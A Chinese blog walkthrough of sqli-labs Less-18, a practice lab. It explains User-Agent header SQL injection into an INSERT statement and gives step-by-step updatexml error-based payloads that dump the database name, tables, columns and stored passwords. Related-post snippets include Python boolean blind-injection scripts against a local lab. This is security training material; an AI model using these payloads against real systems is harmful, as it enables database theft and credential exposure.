sqli-labs第十八关详解

已于 2022-05-05 10:59:20 修改
阅读量6.4k 收藏 23
点赞数 18
CC 4.0 BY-SA版权
文章标签: SQL注入
于 2022-05-03 10:23:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/124434792
本文详细解析了一个SQL注入漏洞的利用过程,重点在于报错注入技术。首先介绍了HTTP_USER_AGENT和REMOTE_ADDR的概念,然后分析了登录验证的SQL语句,指出在用户登录后执行的未过滤的SQL插入语句是攻击点。通过构造特殊的输入,如1',1,updatexml(1,concat(0x5e,database()),1))#,可以触发报错并回显数据库名。接着,利用updatexml和group_concat函数,逐步获取表名、字段名和数据,即使报错信息有限,也能通过多次请求获取完整信息。文章深入探讨了如何利用闭合VALUES和报错反馈来实施SQL注入攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先看一下源码

这里定义的函数跟十七关的一样,具体解析可看sqli-labs第十七关详解_金 帛的博客-CSDN博客

HTTP_USER_AGENT        是请求用户代理的信息,也就是http头User-Agent:的内容

REMOTE_ADDE        是指浏览当前页面的用户的IP地址,也就是搭建靶场的那个IP地址 

 接着我们继续看

这里当用户名跟密码都有输入的时候才能触发的,可以看到用户名和密码都被过筛了,也就是不能在这里进行SQL注入了,接着再往下看看

这里可以看到,当登入进去的时候,还会再执行一条SQL语句并且包涵的$uagent没有被过滤掉,,还看到后面的语句中还会进行报错回馈,因此我们可以利用这两个地方为注入点,但是得通过抓包请求进行报错注入

可利用的SQL语句是

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

这时我们就不能像常规的报错盲注一样直接上,我们得考虑一下闭合VALUES,假如我们利用的点是$uagent,那构建格式就应该是1',1,1)#,在SQL语句中相当于

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1',1,1)#, '$IP', $uname)

这样就闭合了VALUES,所以我们在uagent上正确的payload应该是

1',1,updatexml(1,concat(0x5e,database()),1))#

可以看到回显了数据库名称,接着我们爆表,构建payload

1',1,updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema = database())),1))#

接着爆字段,构建payload

1',1,updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')),1))#

接着查看字段,构建payload

1',1,updatexml(1,concat(0x5e,(select group_concat(password) from users)),1))#

由于报错语句只能回显32位的缘故,这里只回显了一小部分密码,可以利用mid函数,截断SQL语句,来回显剩下的密码

也就是mid(SQL语句,32,32)

构造payload

1',1,updatexml(1,concat(0x5e,mid((select group_concat(password) from users),32,32)),1))#

 继续构造

1',1,updatexml(1,concat(0x5e,mid((select group_concat(password) from users),64,32)),1))#

接着将上面回显的内容拼起来就得到全部密码了

Sqli-labs靶场18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1831
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-labs18
jimggg的博客
03-20 280
Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
sqli-labs第十八
最新发布
fristchoice的博客
07-13 244
本文详细介绍了使用SQLMap工具进行SQL注入攻击的完整流程:1)通过BurpSuite抓包发现潜在注入点;2)使用SQLMap识别注入点并获取数据库版本信息;3)查询获取所有数据库名;4)指定数据库查询表名;5)通过两种方式查看表数据(直接导出或分步查询列名和数据)。文中提供了具体操作命令,展示了从发现注入点到获取敏感数据的完整攻击链。该内容仅用于安全研究目的,未经授权测试属违法行为。
SQLI-labs-第十八
weixin_54055099的博客
05-17 1396
Sqli-labs18,http头部注入,报错注入
sqli-labs(18)
weixin_30498921的博客
05-26 287
开始挑战第十八(Header Injection - Uagent field - Error based) 常见的HTTP注入点产生位置为【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】; (1)HTTP Referer是header的一部分,当浏览器向web服务...
sqli-labs18(基于http头部报错盲注)通思路
zyh1588的博客
11-18 2688
小白回顾sql靶场18
Sqlilabs-18
KAKA的博客
07-09 973
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9198
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1322
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
sqli-labssqli-labs 靶场(1-16)
m0_71944965的博客
09-02 716
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场sqli-labs 靶场(1-16)sqli-labs第一 sqli-labs第一 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
Sqli-labs-master靶场之1-21秘籍
m0_66241651的博客
07-03 951
靶场就是让我们掌握sql注入的基本方法,通秘籍来了,轻轻松松搞定!
sqli-labs--------18
wyzhxhn的博客
11-10 1427
sql插入语句 User-Agent
SQLi Labs Lesson18
1ame的博客
08-15 1895
Lesson - 18 POST - Header Injection - Uagent field - Error based 首先进入欢迎界面: 本节对username,password都进行了过滤。 后台过滤的php源代码: $uname = check_input($_POST['uname']); $passwd = check_input($_POST['
sqli-labs靶场第十八
gou1791241251的博客
12-28 2209
十八有点特殊,后台对输入的账号和密码都调用了函数进行过滤了,所以要转换注入方式,尝试去请求头里面修改信息。 可以尝试cookie注入,user-agent注入,refer字段注入。最终在user-agent字段发现注入点,因为输入单引号或双引号时有报错显示。 这次注入前提是输入的账号密码正确才会去执行user-agent的sql语句。在此次例子用了报错注入的方式进行爆表和爆库。 ...
SQLI-LABS靶场18:Truncated incorrect DOUBLE value错误
sinat_39522506的博客
07-17 382
注入时,PAYLOAD正确,但是出现Truncated incorrect DOUBLE value:Mozilla/5.0 (Windows NT 10.0;sql版本换到5.5.29版本(5.5.x应该都可以)如果显示数据库连接失败,重启一下靶场
sqli.labs靶场(第18~22
喜欢创作各种技术类文章,希望可以帮到你
01-28 2198
sqli.labs靶场18到22详情
SQL-labs的第18——http请求头注入(User-Agent)报错注入
qq_73393033的博客
07-21 622
并且,在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们这次使用extractvalue函数进行报错注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
sqli-labs第八详解
03-27
### SQLi-Labs 第八解析 #### 背景介绍 SQLi-Labs 是一款用于学习和实践 SQL 注入技术的开源工具。第八的目标是通过 SQL 注入漏洞获取数据库的相信息,例如数据库名称或其他敏感数据。 --- #### 技术分析与解决方法 ##### 1. 判断是否存在 SQL 注入漏洞 在本卡中,`index.php?id=1` 参数存在潜在的 SQL 注入风险。可以通过输入特殊字符来验证这一点。例如,当提交 `id=1'` 或者类似的畸形输入时,如果页面返回异常行为(如错误提示或者逻辑变化),则可以初步确认该参数可能存在注入点[^2]。 ##### 2. 探测注入方式 由于题目描述提到没有明显的报错信息,而是依赖于特定反馈机制——即 “You are in...”,因此需要利用布尔盲注的方式逐步推断目标数据库的信息[^4]。 ###### (a) 数据库长度检测 为了高效地提取数据库名字,首先应确定其长度。以下是实现此功能的一个 Python 示例脚本: ```python import requests def get_database_length(): url = "http://localhost/sqli-labs/Less-8/index.php" for i in range(20): # 假设最大可能长度不超过20 payload = f"1' AND LENGTH(DATABASE())>{i}-- " data = {'id': payload} response = requests.get(url, params=data) if 'You are in...........' not in response.text: return i database_length = get_database_length() print(f"The length of the database name is {database_length}.") ``` 上述代码会不断调整条件表达式的阈值直到找到确切的字数为止。 ###### (b) 枚举数据库名称 一旦得知了数据库的名字总共有多少字母组成之后,就可以逐位读取这些字符的内容了。下面展示了一个简单的循环结构用来完成这项任务: ```python def retrieve_database_name(length): db_name = "" charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.-" # 可能使用的字符集 url = "http://localhost/sqli-labs/Less-8/index.php" for pos in range(1, length + 1): for char in charset: payload = f"1' AND SUBSTRING((SELECT DATABASE()),{pos},1)=CHAR({ord(char)})-- " data = {'id': payload} response = requests.get(url, params=data) if 'You are in...........' in response.text: db_name += char break return db_name db_name_result = retrieve_database_name(database_length) print(f"The database name is '{db_name_result}'.") ``` 这段程序基于之前计算出来的长度值逐一测试每一位对应的 ASCII 编码数值,并拼接成完整的字符串形式输出结果[^3]。 --- #### 总结 通过对 Less-8 的深入研究可以看出,在面对无明显错误回显的情况下,采用布尔型时间延迟等隐秘手法同样能够成功实施攻击。然而值得注意的是,在真实环境中进行此类操作往往违反法律法规,请务必仅限于授权范围内练习! ---
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值